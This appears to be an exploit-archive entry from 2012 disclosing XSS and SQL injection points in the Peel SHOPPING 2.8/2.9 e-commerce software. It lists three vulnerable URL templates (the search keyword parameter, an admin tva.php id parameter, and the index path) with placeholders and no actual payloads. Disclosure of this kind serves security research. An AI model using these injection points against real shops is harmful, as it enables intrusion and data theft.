Peel SHOPPING - version 2.8 and version 2.9 xss/sql inject Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Peel SHOPPING - version 2.8 and version 2.9 xss/sql inject Vulnerability
# Published : 2012-01-26
# Author :
# Previous Title : Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure
# Next Title : TinyWebGallery 1.8.3 Remote Command Execution

+-------------------------------------------------------------------------+
# Exploit Title : Peel SHOPPING - version 2.8 and version 2.9 xss/sql inject Vulnerability
# version       : v2.9                                                                                                                          
# Author        : Cyber-Crystal                                             
# Date          : n/a  
# Software Link : http://www.peel.fr/ || or http://www.easy-script.com/scripts-PHP/peel-v29-4308.html                                                                                
+-------------------------------------------------------------------------+


[+] Exploits

http://localhost/peel/index.php/achat/recherche.php?motclef=[Xss Here ]&action=Rechercher

http://localhost/peel/administrer/tva.php?mode=modif&id=[SQL]

http://localhost/peel/index.php/[XSS]





# The End //